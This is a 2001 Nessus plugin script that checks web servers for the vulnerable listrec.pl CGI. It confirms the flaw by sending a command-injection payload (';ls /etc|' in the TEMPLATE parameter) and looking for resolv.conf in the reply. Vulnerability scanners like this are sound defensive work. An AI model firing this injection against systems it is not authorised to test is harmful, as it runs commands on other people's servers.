#
# This script written by Matt Moore <matt@westpoint.ltd.uk> 
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10769);
 name["english"] = "Checks for listrec.pl";
 script_name(english:name["english"]);
 
 desc["english"] = "The 'listrec.pl' cgi is installed. This CGI has
a security flaw that lets an attacker execute arbitrary
commands on the remote server, usually with the priveliges of the web server. 

Solution: Remove it from /cgi-bin/common/.

Risk factor : Serious

References:
www.textor.com/index.html (vendor)
www.securitytracker.com/alerts/2001/Sep/1002404.html (advisory)
";



 script_description(english:desc["english"]);
 
 summary["english"] = "Checks for the listrec.pl CGI";
 
 script_summary(english:summary["english"]);
 
 script_category(ACT_GATHER_INFO);
 
 
 script_copyright(english:"This script is Copyright (C) 2001 Matt Moore ",
		francais:"Ce script est Copyright (C) 2001  Matt Moore");

 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";

 script_family(english:family["english"], francais:family["francais"]);

 script_dependencie("find_service.nes");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

port = is_cgi_installed("/common/listrec.pl");
if(port)
{
 item = string(cgibin(), "/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|");
 soc = http_open_socket(port);
 if(soc)
 {
  # Send request and see if the filename is in the response. 
  req = http_get(item:item, port:port);
  send(socket:soc, data:req);
  res = recv(socket:soc, length:8192);
  if("resolv.conf" >< res) security_hole(port);
  close(soc);
 }
}
